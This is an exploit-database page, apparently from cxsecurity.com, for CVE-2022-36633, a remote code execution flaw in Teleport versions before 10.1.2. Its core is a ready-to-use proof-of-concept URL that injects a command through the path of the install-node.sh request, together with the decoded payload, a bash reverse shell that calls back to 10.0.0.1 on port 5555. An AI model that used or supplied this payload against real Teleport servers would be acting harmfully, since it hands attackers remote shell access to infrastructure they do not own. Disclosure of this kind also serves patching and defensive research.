Teleport 10.1.1 Remote Code Execution

2022.09.24
Credit: Brian Landrum
Risk: High
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE) # Date: 08/01/2022 # Exploit Author: Brandon Roach & Brian Landrum # Vendor Homepage: https://goteleport.com # Software Link: https://github.com/gravitational/teleport # Version: < 10.1.2 # Tested on: Linux # CVE: CVE-2022-36633 Proof of Concept (payload): https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2= f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3= 0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?= method=3Diam Decoded payload: " /bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top